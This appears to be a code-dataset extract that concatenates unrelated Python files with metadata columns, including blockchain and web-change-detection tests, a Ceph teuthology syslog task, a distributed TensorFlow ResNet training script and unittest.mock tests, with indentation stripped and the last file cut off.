assert len(history[edition_number]) == 2
transfer_data = history[edition_number][1]
assert transfer_data['action'] == 'TRANSFER'
assert transfer_data['edition_number'] == edition_number
assert transfer_data['from_address'] == alice
assert transfer_data['number_editions'] == 3
assert transfer_data['piece_address'] == piece_hash
assert transfer_data['timestamp_utc']
assert transfer_data['to_address'] == bob
assert transfer_data['txid'] == txid
assert transfer_data['verb'] == b'ASCRIBESPOOL01TRANSFER2'
def test_loan_history(federation, bob, carol, spool_regtest, spider,
transferred_edition_two_hashes, rpconn):
from .conftest import reload_address
edition_number = 2
loan_start, loan_end = '171017', '181018'
piece_hash = transferred_edition_two_hashes[0]
reload_address(bob, rpconn)
txid = spool_regtest.loan(
('', bob),
carol,
transferred_edition_two_hashes,
b'bob-secret',
2,
loan_start,
loan_end,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hash)
assert len(history) == 3
assert '' in history
assert 0 in history
assert edition_number in history
assert len(history['']) == 1
assert len(history[0]) == 1
assert len(history[edition_number]) == 3
loan_data = history[edition_number][2]
assert loan_data['action'] == 'LOAN'
assert loan_data['edition_number'] == edition_number
assert loan_data['from_address'] == bob
assert loan_data['number_editions'] == 3
assert loan_data['piece_address'] == piece_hash
assert loan_data['timestamp_utc']
assert loan_data['to_address'] == carol
assert loan_data['txid'] == txid
assert loan_data['verb'] == b'ASCRIBESPOOL01LOAN2/171017181018'
def test_chain(loaned_edition_two_hashes, spider):
from spool import BlockchainSpider
history = spider.history(loaned_edition_two_hashes[0])
chain = BlockchainSpider.chain(history, 2)
assert len(chain) == 3
assert chain[0]['action'] == 'REGISTER'
assert chain[1]['action'] == 'TRANSFER'
assert chain[2]['action'] == 'LOAN'
assert chain[0]['edition_number'] == 2
assert chain[1]['edition_number'] == 2
assert chain[2]['edition_number'] == 2
def test_strip_loan(loaned_edition_two_hashes, spider):
from spool import BlockchainSpider
history = spider.history(loaned_edition_two_hashes[0])
chain = BlockchainSpider.chain(history, 2)
assert len(chain) == 3
assert 'LOAN' in (tx['action'] for tx in chain)
chain = BlockchainSpider.strip_loan(chain)
assert len(chain) == 2
assert 'LOAN' not in (tx['action'] for tx in chain)
def test_pprint(transferred_edition_two_hashes, spider):
from spool import BlockchainSpider
history = spider.history(transferred_edition_two_hashes[0])
BlockchainSpider.pprint(history)
| tests/test_spoolex.py | 13,840 | Test :staticmethod:`check_script`.
Args;
alice (str): bitcoin address of alice, the sender
bob (str): bitcoin address of bob, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) to bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
An invalid transaction in this context is one that does not contain a
``vout`` for which the ``hex`` is a valid ``Spool`` verb.
Args;
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
An invalid transaction in this context is one that has inputs from
different addresses.
Args;
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
-*- coding: utf-8 -*- TODO do not rely on Spool TODO do not rely on Spool | 1,365 | en | 0.693011 |
#!/usr/bin/python3
import time
from flask import url_for
from urllib.request import urlopen
from . util import set_original_response, set_modified_response, live_server_setup
sleep_time_for_fetch_thread = 3
# Basic test to check inscriptus is not adding return line chars, basically works etc
def test_inscriptus():
from inscriptis import get_text
html_content="<html><body>test!<br/>ok man</body></html>"
stripped_text_from_html = get_text(html_content)
assert stripped_text_from_html == 'test!\nok man'
def test_check_basic_change_detection_functionality(client, live_server):
set_original_response()
live_server_setup(live_server)
# Add our URL to the import page
res = client.post(
url_for("import_page"),
data={"urls": url_for('test_endpoint', _external=True)},
follow_redirects=True
)
assert b"1 Imported" in res.data
time.sleep(sleep_time_for_fetch_thread)
# Do this a few times.. ensures we dont accidently set the status
for n in range(3):
client.get(url_for("api_watch_checknow"), follow_redirects=True)
# Give the thread time to pick it up
time.sleep(sleep_time_for_fetch_thread)
# It should report nothing found (no new 'unviewed' class)
res = client.get(url_for("index"))
assert b'unviewed' not in res.data
assert b'test-endpoint' in res.data
# Default no password set, this stuff should be always available.
assert b"SETTINGS" in res.data
assert b"BACKUP" in res.data
assert b"IMPORT" in res.data
#####################
# Check HTML conversion detected and workd
res = client.get(
url_for("preview_page", uuid="first"),
follow_redirects=True
)
# Check this class does not appear (that we didnt see the actual source)
assert b'foobar-detection' not in res.data
# Make a change
set_modified_response()
res = urlopen(url_for('test_endpoint', _external=True))
assert b'which has this one new line' in res.read()
# Force recheck
res = client.get(url_for("api_watch_checknow"), follow_redirects=True)
assert b'1 watches are queued for rechecking.' in res.data
time.sleep(sleep_time_for_fetch_thread)
# Now something should be ready, indicated by having a 'unviewed' class
res = client.get(url_for("index"))
assert b'unviewed' in res.data
# #75, and it should be in the RSS feed
res = client.get(url_for("rss"))
expected_url = url_for('test_endpoint', _external=True)
assert b'<rss' in res.data
# re #16 should have the diff in here too
assert b'(into ) which has this one new line' in res.data
assert b'CDATA' in res.data
assert expected_url.encode('utf-8') in res.data
# Following the 'diff' link, it should no longer display as 'unviewed' even after we recheck it a few times
res = client.get(url_for("diff_history_page", uuid="first"))
assert b'Compare newest' in res.data
time.sleep(2)
# Do this a few times.. ensures we dont accidently set the status
for n in range(2):
client.get(url_for("api_watch_checknow"), follow_redirects=True)
# Give the thread time to pick it up
time.sleep(sleep_time_for_fetch_thread)
# It should report nothing found (no new 'unviewed' class)
res = client.get(url_for("index"))
assert b'unviewed' not in res.data
assert b'head title' not in res.data # Should not be present because this is off by default
assert b'test-endpoint' in res.data
set_original_response()
# Enable auto pickup of <title> in settings
res = client.post(
url_for("settings_page"),
data={"extract_title_as_title": "1", "minutes_between_check": 180, 'fetch_backend': "html_requests"},
follow_redirects=True
)
client.get(url_for("api_watch_checknow"), follow_redirects=True)
time.sleep(sleep_time_for_fetch_thread)
res = client.get(url_for("index"))
assert b'unviewed' in res.data
# It should have picked up the <title>
assert b'head title' in res.data
#
# Cleanup everything
res = client.get(url_for("api_delete", uuid="all"), follow_redirects=True)
assert b'Deleted' in res.data
| changedetectionio/tests/test_backend.py | 4,279 | !/usr/bin/python3 Basic test to check inscriptus is not adding return line chars, basically works etc Add our URL to the import page Do this a few times.. ensures we dont accidently set the status Give the thread time to pick it up It should report nothing found (no new 'unviewed' class) Default no password set, this stuff should be always available. Check HTML conversion detected and workd Check this class does not appear (that we didnt see the actual source) Make a change Force recheck Now something should be ready, indicated by having a 'unviewed' class 75, and it should be in the RSS feed re 16 should have the diff in here too Following the 'diff' link, it should no longer display as 'unviewed' even after we recheck it a few times Do this a few times.. ensures we dont accidently set the status Give the thread time to pick it up It should report nothing found (no new 'unviewed' class) Should not be present because this is off by default Enable auto pickup of <title> in settings It should have picked up the <title> Cleanup everything | 1,051 | en | 0.9083 |
# -*- coding: utf-8 -*-
"""
kay.ext.gaema.urls
:Copyright: (c) 2009 Takashi Matsuo <tmatsuo@candit.jp>
All rights reserved.
:license: BSD, see LICENSE for more details.
"""
from kay.routing import (
ViewGroup, Rule
)
view_groups = [
ViewGroup(
Rule('/login/<service>', endpoint='login',
view='kay.ext.gaema.views.login'),
Rule('/logout/<service>', endpoint='logout',
view='kay.ext.gaema.views.logout'),
Rule('/marketplace_login/a/<domain>', endpoint='marketplace_login',
view='kay.ext.gaema.views.marketplace_login'),
Rule('/marketplace_logout/<domain>', endpoint='marketplace_logout',
view='kay.ext.gaema.views.marketplace_logout'),
Rule('/select_service/<targets>', endpoint='select_service',
view='kay.ext.gaema.views.select_service'),
)
]
| kay/ext/gaema/urls.py | 839 | kay.ext.gaema.urls
:Copyright: (c) 2009 Takashi Matsuo <tmatsuo@candit.jp>
All rights reserved.
:license: BSD, see LICENSE for more details.
-*- coding: utf-8 -*- | 186 | en | 0.54642 |
"""
Asyncio using Asyncio.Task to execute three math function in parallel
"""
import asyncio
@asyncio.coroutine
def factorial(number):
f = 1
for i in range(2, number+1):
print("Asyncio.Task: Compute factorial(%s)" % (i))
yield from asyncio.sleep(1)
f *= i
print("Asyncio.Task - factorial(%s) = %s" % (number, f))
@asyncio.coroutine
def fibonacci(number):
a, b = 0, 1
for i in range(number):
print("Asyncio.Task: Compute fibonacci (%s)" % (i))
yield from asyncio.sleep(1)
a, b = b, a + b
print("Asyncio.Task - fibonacci(%s) = %s" % (number, a))
@asyncio.coroutine
def binomialCoeff(n, k):
result = 1
for i in range(1, k+1):
result = result * (n-i+1) / i
print("Asyncio.Task: Compute binomialCoeff (%s)" % (i))
yield from asyncio.sleep(1)
print("Asyncio.Task - binomialCoeff(%s , %s) = %s" % (n,k,result))
if __name__ == "__main__":
tasks = [asyncio.Task(factorial(10)),
asyncio.Task(fibonacci(10)),
asyncio.Task(binomialCoeff(20,10))]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
| Chapter 4/asyncio_Task.py | 1,178 | Asyncio using Asyncio.Task to execute three math function in parallel | 69 | en | 0.627545 |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import unittest
from dataclasses import dataclass
from textwrap import dedent
from typing import Dict
from pants.engine.fs import FileContent
from pants.option.config import Config, TomlSerializer
@dataclass(frozen=True)
class ConfigFile:
content: str
default_values: Dict
expected_options: Dict
FILE_1 = ConfigFile(
content=dedent(
"""
[DEFAULT]
name = "%(env.NAME)s"
answer = 42
scale = 1.2
path = "/a/b/%(answer)s"
embed = "%(path)s::%(name)s"
disclaimer = '''
Let it be known
that.'''
[a]
# TODO: once TOML releases its new version with support for heterogenous lists, we should be
# able to rewrite this to `[1, 2, 3, "%(answer)s"`. See
# https://github.com/toml-lang/toml/issues/665.
list = ["1", "2", "3", "%(answer)s"]
list2.add = [7, 8, 9]
list3.remove = ["x", "y", "z"]
[b]
preempt = true
[c]
name = "overridden_from_default"
interpolated_from_section = "%(name)s is interpolated"
recursively_interpolated_from_section = "%(interpolated_from_section)s (again)"
[d.dict_val]
# Make sure we don't misinterpret `add` and `remove` as list options.
add = 0
remove = 0
nested = { nested_key = 'foo' }
[list_merging]
list1 = []
list2 = [1, 2]
list3.add = [3, 4]
list4.remove = [5]
list5 = [6, 7]
"""
),
default_values={
"name": "foo",
"answer": 42,
"scale": 1.2,
"path": "/a/b/42",
"embed": "/a/b/42::foo",
"disclaimer": "Let it be known\nthat.",
},
expected_options={
"a": {"list": '["1", "2", "3", "42"]', "list2": "+[7, 8, 9]", "list3": '-["x", "y", "z"]'},
"b": {"preempt": "True"},
"c": {
"name": "overridden_from_default",
"interpolated_from_section": "overridden_from_default is interpolated",
"recursively_interpolated_from_section": "overridden_from_default is interpolated (again)",
},
"d": {"dict_val": "{'add': 0, 'remove': 0, 'nested': {'nested_key': 'foo'}"},
"list_merging": {
"list1": "[]",
"list2": "[1, 2]",
"list3": "+[3, 4]",
"list4": "-[5]",
"list5": "[6, 7]",
},
},
)
FILE_2 = ConfigFile(
content=dedent(
"""
[a]
fast = true
[b]
preempt = false
[d]
list.add = [0, 1]
list.remove = [8, 9]
[empty_section]
[list_merging]
list1 = [11, 22]
list2.add = [33]
list3.add = [8, 9]
list3.remove = [4, 55]
list4 = [66]
list6.add = [77, 88]
"""
),
default_values={},
expected_options={
"a": {"fast": "True"},
"b": {"preempt": "False"},
"d": {"list": "+[0, 1],-[8, 9]"},
"empty_section": {},
"list_merging": {
"list1": "[11, 22]",
"list2": "+[33]",
"list3": "+[8, 9],-[4, 55]",
"list4": "[66]",
"list6": "+[77, 88]",
},
},
)
def _setup_config() -> Config:
parsed_config = Config.load(
file_contents=[
FileContent("file1.toml", FILE_1.content.encode()),
FileContent("file2.toml", FILE_2.content.encode()),
],
seed_values={"buildroot": "fake_buildroot"},
env={"NAME": "foo"},
)
assert ["file1.toml", "file2.toml"] == parsed_config.sources()
return parsed_config
class ConfigTest(unittest.TestCase):
def setUp(self) -> None:
self.config = _setup_config()
self.default_seed_values = Config._determine_seed_values(
seed_values={"buildroot": "fake_buildroot"},
env={"NAME": "foo"},
)
self.expected_combined_values: dict[str, dict[str, list[str]]] = {
"a": {
"list": ['["1", "2", "3", "42"]'],
"list2": ["+[7, 8, 9]"],
"list3": ['-["x", "y", "z"]'],
"fast": ["True"],
},
"b": {"preempt": ["True", "False"]},
"c": {
"name": ["overridden_from_default"],
"interpolated_from_section": ["overridden_from_default is interpolated"],
"recursively_interpolated_from_section": [
"overridden_from_default is interpolated (again)"
],
},
"d": {
"dict_val": ["{'add': 0, 'remove': 0, 'nested': {'nested_key': 'foo'}}"],
"list": ["+[0, 1],-[8, 9]"],
},
"empty_section": {},
"list_merging": {
"list1": ["[]", "[11, 22]"],
"list2": ["[1, 2]", "+[33]"],
"list3": ["+[3, 4]", "+[8, 9],-[4, 55]"],
"list4": ["-[5]", "[66]"],
"list5": ["[6, 7]"],
"list6": ["+[77, 88]"],
},
}
def test_default_values(self) -> None:
# This is used in `options_bootstrapper.py` to ignore default values when validating options.
file1_values = self.config.values[0]
file2_values = self.config.values[1]
# NB: string interpolation should only happen when calling _ConfigValues.get_value(). The
# values for _ConfigValues.defaults are not yet interpolated.
default_file1_values_unexpanded = {
**FILE_1.default_values,
"name": "%(env.NAME)s",
"path": "/a/b/%(answer)s",
"embed": "%(path)s::%(name)s",
}
assert file1_values.defaults == {
**self.default_seed_values,
**default_file1_values_unexpanded,
}
assert file2_values.defaults == self.default_seed_values
def test_get(self) -> None:
# Check the DEFAULT section
# N.B.: All values read from config files are read as str and only later converted by the
# options parser to the expected destination type; so we ensure we're comparing strings
# here.
for option, value in self.default_seed_values.items():
# Both config files have the seed values.
assert self.config.get(section="DEFAULT", option=option) == [str(value), str(value)]
for option, value in FILE_1.default_values.items():
# Only FILE_1 has explicit DEFAULT values.
assert self.config.get(section="DEFAULT", option=option) == [str(value)]
# Check the combined values.
for section, section_values in self.expected_combined_values.items():
for option, value_list in section_values.items():
assert self.config.get(section=section, option=option) == value_list
def test_empty(self) -> None:
config = Config.load([])
assert config.sources() == []
def test_toml_serializer() -> None:
original_values: Dict = {
"GLOBAL": {
"truthy": True,
"falsy": False,
"int": 0,
"float": 0.0,
"word": "hello there",
"listy": ["a", "b", "c"],
"map": {"a": 0, "b": 1},
},
"some-subsystem": {"o": ""},
}
assert TomlSerializer(original_values).normalize() == {
"GLOBAL": {**original_values["GLOBAL"], "map": "{'a': 0, 'b': 1}"},
"some-subsystem": {"o": ""},
}
def test_toml_serializer_list_add_remove() -> None:
original_values = {"GLOBAL": {"backend_packages.add": ["added"]}}
assert TomlSerializer(original_values).normalize() == { # type: ignore[arg-type]
"GLOBAL": {"backend_packages": "+['added']"}
}
| src/python/pants/option/config_test.py | 7,911 | Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). Licensed under the Apache License, Version 2.0 (see LICENSE). This is used in `options_bootstrapper.py` to ignore default values when validating options. NB: string interpolation should only happen when calling _ConfigValues.get_value(). The values for _ConfigValues.defaults are not yet interpolated. Check the DEFAULT section N.B.: All values read from config files are read as str and only later converted by the options parser to the expected destination type; so we ensure we're comparing strings here. Both config files have the seed values. Only FILE_1 has explicit DEFAULT values. Check the combined values. type: ignore[arg-type] | 703 | en | 0.61469 |
import contextlib
import logging
from cStringIO import StringIO
from teuthology import misc
from teuthology.job_status import set_status
from teuthology.orchestra import run
log = logging.getLogger(__name__)
@contextlib.contextmanager
def syslog(ctx, config):
"""
start syslog / stop syslog on exit.
"""
if ctx.archive is None:
# disable this whole feature if we're not going to archive the data
# anyway
yield
return
log.info('Starting syslog monitoring...')
archive_dir = misc.get_archive_dir(ctx)
log_dir = '{adir}/syslog'.format(adir=archive_dir)
run.wait(
ctx.cluster.run(
args=['mkdir', '-p', '-m0755', '--', log_dir],
wait=False,
)
)
CONF = '/etc/rsyslog.d/80-cephtest.conf'
kern_log = '{log_dir}/kern.log'.format(log_dir=log_dir)
misc_log = '{log_dir}/misc.log'.format(log_dir=log_dir)
conf_lines = [
'kern.* -{kern_log};RSYSLOG_FileFormat'.format(kern_log=kern_log),
'*.*;kern.none -{misc_log};RSYSLOG_FileFormat'.format(
misc_log=misc_log),
]
conf_fp = StringIO('\n'.join(conf_lines))
try:
for rem in ctx.cluster.remotes.iterkeys():
log_context = 'system_u:object_r:var_log_t:s0'
for log_path in (kern_log, misc_log):
rem.run(args='touch %s' % log_path)
rem.chcon(log_path, log_context)
misc.sudo_write_file(
remote=rem,
path=CONF,
data=conf_fp,
)
conf_fp.seek(0)
run.wait(
ctx.cluster.run(
args=[
'sudo',
'service',
# a mere reload (SIGHUP) doesn't seem to make
# rsyslog open the files
'rsyslog',
'restart',
],
wait=False,
),
)
yield
finally:
log.info('Shutting down syslog monitoring...')
run.wait(
ctx.cluster.run(
args=[
'sudo',
'rm',
'-f',
'--',
CONF,
run.Raw('&&'),
'sudo',
'service',
'rsyslog',
'restart',
],
wait=False,
),
)
# race condition: nothing actually says rsyslog had time to
# flush the file fully. oh well.
log.info('Checking logs for errors...')
for rem in ctx.cluster.remotes.iterkeys():
log.debug('Checking %s', rem.name)
r = rem.run(
args=[
'egrep', '--binary-files=text',
'\\bBUG\\b|\\bINFO\\b|\\bDEADLOCK\\b',
run.Raw('{adir}/syslog/*.log'.format(adir=archive_dir)),
run.Raw('|'),
'grep', '-v', 'task .* blocked for more than .* seconds',
run.Raw('|'),
'grep', '-v', 'lockdep is turned off',
run.Raw('|'),
'grep', '-v', 'trying to register non-static key',
run.Raw('|'),
'grep', '-v', 'DEBUG: fsize', # xfs_fsr
run.Raw('|'),
'grep', '-v', 'CRON', # ignore cron noise
run.Raw('|'),
'grep', '-v', 'BUG: bad unlock balance detected', # #6097
run.Raw('|'),
'grep', '-v', 'inconsistent lock state', # FIXME see #2523
run.Raw('|'),
'grep', '-v', '*** DEADLOCK ***', # part of lockdep output
run.Raw('|'),
'grep', '-v',
# FIXME see #2590 and #147
'INFO: possible irq lock inversion dependency detected',
run.Raw('|'),
'grep', '-v',
'INFO: NMI handler (perf_event_nmi_handler) took too long to run', # noqa
run.Raw('|'),
'grep', '-v', 'INFO: recovery required on readonly',
run.Raw('|'),
'grep', '-v', 'ceph-create-keys: INFO',
run.Raw('|'),
'egrep', '-v', '\\bsalt-master\\b|\\bsalt-minion\\b|\\bsalt-api\\b',
run.Raw('|'),
'head', '-n', '1',
],
stdout=StringIO(),
)
stdout = r.stdout.getvalue()
if stdout != '':
log.error('Error in syslog on %s: %s', rem.name, stdout)
set_status(ctx.summary, 'fail')
if 'failure_reason' not in ctx.summary:
ctx.summary['failure_reason'] = \
"'{error}' in syslog".format(error=stdout)
log.info('Compressing syslogs...')
run.wait(
ctx.cluster.run(
args=[
'find',
'{adir}/syslog'.format(adir=archive_dir),
'-name',
'*.log',
'-print0',
run.Raw('|'),
'sudo',
'xargs',
'-0',
'--no-run-if-empty',
'--',
'gzip',
'--',
],
wait=False,
),
)
| teuthology/task/internal/syslog.py | 5,609 | start syslog / stop syslog on exit.
disable this whole feature if we're not going to archive the data anyway a mere reload (SIGHUP) doesn't seem to make rsyslog open the files race condition: nothing actually says rsyslog had time to flush the file fully. oh well. xfs_fsr ignore cron noise 6097 FIXME see 2523 part of lockdep output FIXME see 2590 and 147 noqa | 363 | en | 0.884214 |
#https://www.codechef.com/problems/DECINC
n = int(input())
if(n%4==0):
print(n+1)
else:
print(n-1) | CodeChef/DECINC_Decrement OR Increment.py | 106 | https://www.codechef.com/problems/DECINC | 40 | en | 0.34274 |
r"""Distributed TensorFlow with Monitored Training Session.
This implements the 1a image recognition benchmark task, see https://mlbench.readthedocs.io/en/latest/benchmark-tasks.html#a-image-classification-resnet-cifar-10
for more details
Adapted from official tutorial::
https://www.tensorflow.org/deploy/distributed
Launch::
mpirun -n 3 --allow-run-as-root python ....
"""
import argparse
import logging
import os
import tensorflow as tf
from mlbench_core.controlflow.tensorflow.train_validation import train_round, \
validation_round
from mlbench_core.dataset.imagerecognition.tensorflow.cifar10 import \
DatasetCifar
from mlbench_core.evaluation.goals import task1_time_to_accuracy_light_goal, \
task1_time_to_accuracy_goal
from mlbench_core.evaluation.tensorflow.criterion import \
softmax_cross_entropy_with_logits_v2_l2_regularized
from mlbench_core.evaluation.tensorflow.metrics import TopKAccuracy
from mlbench_core.lr_scheduler.tensorflow.lr import manual_stepping
from mlbench_core.models.tensorflow.resnet_model import Cifar10Model
from mlbench_core.utils import Tracker
def define_graph(inputs, labels, is_training, batch_size, replicas_to_aggregate):
"""
Define graph for synchronized training.
"""
model = Cifar10Model(
resnet_size=20,
data_format='channels_last',
resnet_version=2,
dtype=tf.float32)
logits = model(inputs, is_training)
loss = softmax_cross_entropy_with_logits_v2_l2_regularized(
logits=logits,
labels=labels,
l2=2e-4,
# Exclude BN weights from L2 regularizer
loss_filter_fn=lambda name: 'batch_normalization' not in name)
# Use Top K accuracy as metrics
metrics = [
TopKAccuracy(logits, labels, topk=1),
TopKAccuracy(logits, labels, topk=5),
]
global_step = tf.train.get_or_create_global_step()
# scheduling learning steps.
lr_scheduler = manual_stepping(
global_step=global_step,
boundaries=[32000 // replicas_to_aggregate,
48000 // replicas_to_aggregate],
rates=[0.1, 0.01, 0.001],
warmup=False)
# Define the optimizer
optimizer_ = tf.train.MomentumOptimizer(
learning_rate=lr_scheduler,
momentum=0.9,
use_nesterov=True)
# Wrap optimizer with `SyncReplicasOptimizer`
optimizer = tf.train.SyncReplicasOptimizer(
optimizer_,
replicas_to_aggregate=replicas_to_aggregate,
total_num_replicas=replicas_to_aggregate)
hooks = [
optimizer.make_session_run_hook((rank == 0), num_tokens=0)
]
# The update for batch normalization.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# Not all of the processes contribute one update. Some faster procs can push more updates.
grads_and_vars = list(optimizer.compute_gradients(
loss, tf.trainable_variables()))
train_op = optimizer.apply_gradients(
grads_and_vars, global_step=global_step)
return train_op, loss, metrics, hooks
def main(is_ps, run_id, rank, world_size, cluster_spec, batch_size,
replicas_to_aggregate, light_target=False):
logging.info("Initial.")
job_name = "ps" if is_ps else "worker"
cluster = tf.train.ClusterSpec(cluster_spec)
gpu_options = tf.GPUOptions(allow_growth=True,
per_process_gpu_memory_fraction=0.2)
session_conf = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
server = tf.train.Server(
cluster, job_name=job_name, task_index=rank, config=session_conf)
if is_ps:
server.join()
else:
# Pin variables to parameter server.
device_fn = tf.train.replica_device_setter(
ps_tasks=None,
ps_device="/job:ps",
worker_device="/job:{}/task:{}/device:GPU:{}".format(
job_name, rank, rank),
merge_devices=True,
cluster=cluster,
ps_ops=None,
ps_strategy=None)
with tf.Graph().as_default():
with tf.device(device_fn):
data_loader = DatasetCifar(
dataset='cifar-10',
dataset_root='/datasets',
batch_size=batch_size,
world_size=world_size,
rank=rank,
seed=42,
tf_dtype=tf.float32)
train_op, loss, metrics, hooks = define_graph(
data_loader.inputs,
data_loader.labels,
data_loader.training,
batch_size,
replicas_to_aggregate)
local_init_op = tf.group(
tf.local_variables_initializer(),
data_loader.train_init_op,
data_loader.validation_init_op)
scaffold = tf.train.Scaffold(
init_op=None,
init_feed_dict=None,
init_fn=None,
ready_op=None,
ready_for_local_init_op=None,
local_init_op=local_init_op)
lr_tensor_name = tf.get_default_graph().get_tensor_by_name("learning_rate:0")
with tf.train.MonitoredTrainingSession(config=session_conf,
master=server.target,
scaffold=scaffold,
is_chief=(rank == 0),
checkpoint_dir=None,
save_checkpoint_secs=None,
save_summaries_steps=None,
stop_grace_period_secs=5,
hooks=hooks) as sess:
logging.info("Begin training.")
final_epoch = 164
if light_target:
goal = task1_time_to_accuracy_light_goal()
else:
goal = task1_time_to_accuracy_goal()
tracker = Tracker(metrics, run_id, rank, goal=goal)
tracker.start()
for i_epoch in range(final_epoch):
logging.debug("=> Epoch {}".format(i_epoch))
train_round(sess, data_loader.train_init_op, train_op,
loss, metrics, batch_size,
data_loader.num_batches_per_epoch_for_train,
tracker, lr_tensor=lr_tensor_name,
lr_scheduler_level='epoch')
validation_round(sess, data_loader.validation_init_op,
loss, metrics, batch_size,
data_loader.num_batches_per_epoch_for_eval,
tracker)
tracker.epoch_end()
if tracker.goal_reached:
print("Goal Reached!")
return
logging.info("Finish.")
def configure_logger(log_dir, is_ps, rank):
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'{:6} rank={} : %(message)s'.format("ps" if is_ps else "worker", rank),
"%Y-%m-%d %H:%M:%S")
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
logger.addHandler(ch)
log_name = '{}-{}.log'.format("ps" if is_ps else "worker", rank)
log_name = os.path.join(log_dir, log_name)
if os.path.exists(log_name):
os.remove(log_name)
fh = logging.FileHandler(log_name)
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Process run parameters')
parser.add_argument('--run_id', type=str, help='The id of the run')
parser.add_argument('--hosts', type=str, help='The hosts participating in this run')
parser.add_argument('--light', action='store_true', default=False,
help='Train to light target metric goal')
args = parser.parse_args()
rank = int(os.environ['OMPI_COMM_WORLD_RANK'])
size = int(os.environ['OMPI_COMM_WORLD_SIZE'])
hosts = args.hosts.split(",")
if len(hosts) < 2:
raise ValueError("At least 2 pods are needed for this benchmark (1 parameter server, 1 worker)")
workers = [h + ":22222" for h in hosts[1:]]
ps = hosts[0] + ":22222" # First worker is the parameter server
cluster_spec = {"worker": workers,
"ps": [ps]}
# Parse role in the cluster by rank.
is_ps = rank < len(cluster_spec['ps'])
rank = rank if is_ps else rank - len(cluster_spec['ps'])
world_size = size - len(cluster_spec['ps'])
# Configure Logging
if not os.path.exists('/mlbench'):
os.makedirs('/mlbench')
configure_logger('/mlbench', is_ps, rank)
batch_size = 128
replicas_to_aggregate = len(cluster_spec['worker'])
main(is_ps, args.run_id, rank, world_size, cluster_spec,
batch_size, replicas_to_aggregate, light_target=args.light)
| tensorflow/imagerecognition/openmpi-cifar10-resnet20-all-reduce/main.py | 9,469 | Define graph for synchronized training.
Distributed TensorFlow with Monitored Training Session.
This implements the 1a image recognition benchmark task, see https://mlbench.readthedocs.io/en/latest/benchmark-tasks.html#a-image-classification-resnet-cifar-10
for more details
Adapted from official tutorial::
https://www.tensorflow.org/deploy/distributed
Launch::
mpirun -n 3 --allow-run-as-root python ....
Exclude BN weights from L2 regularizer Use Top K accuracy as metrics scheduling learning steps. Define the optimizer Wrap optimizer with `SyncReplicasOptimizer` The update for batch normalization. Not all of the processes contribute one update. Some faster procs can push more updates. Pin variables to parameter server. First worker is the parameter server Parse role in the cluster by rank. Configure Logging | 832 | en | 0.730821 |
# ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import List
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.loggable import Loggable
class BaseTagModel(Loggable):
items = List
# ============= EOF =============================================
| pychron/pipeline/tagging/base_tags.py | 1,157 | =============================================================================== Copyright 2014 Jake Ross Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. =============================================================================== ============= enthought library imports ======================= ============= standard library imports ======================== ============= local library imports ========================== ============= EOF ============================================= | 960 | en | 0.713752 |
import time
import types
import unittest
from unittest.mock import (
call, _Call, create_autospec, MagicMock,
Mock, ANY, _CallList, patch, PropertyMock
)
from datetime import datetime
class SomeClass(object):
def one(self, a, b):
pass
def two(self):
pass
def three(self, a=None):
pass
class AnyTest(unittest.TestCase):
def test_any(self):
self.assertEqual(ANY, object())
mock = Mock()
mock(ANY)
mock.assert_called_with(ANY)
mock = Mock()
mock(foo=ANY)
mock.assert_called_with(foo=ANY)
def test_repr(self):
self.assertEqual(repr(ANY), '<ANY>')
self.assertEqual(str(ANY), '<ANY>')
def test_any_and_datetime(self):
mock = Mock()
mock(datetime.now(), foo=datetime.now())
mock.assert_called_with(ANY, foo=ANY)
def test_any_mock_calls_comparison_order(self):
mock = Mock()
d = datetime.now()
class Foo(object):
def __eq__(self, other):
return False
def __ne__(self, other):
return True
for d in datetime.now(), Foo():
mock.reset_mock()
mock(d, foo=d, bar=d)
mock.method(d, zinga=d, alpha=d)
mock().method(a1=d, z99=d)
expected = [
call(ANY, foo=ANY, bar=ANY),
call.method(ANY, zinga=ANY, alpha=ANY),
call(), call().method(a1=ANY, z99=ANY)
]
self.assertEqual(expected, mock.mock_calls)
self.assertEqual(mock.mock_calls, expected)
class CallTest(unittest.TestCase):
def test_call_with_call(self):
kall = _Call()
self.assertEqual(kall, _Call())
self.assertEqual(kall, _Call(('',)))
self.assertEqual(kall, _Call(((),)))
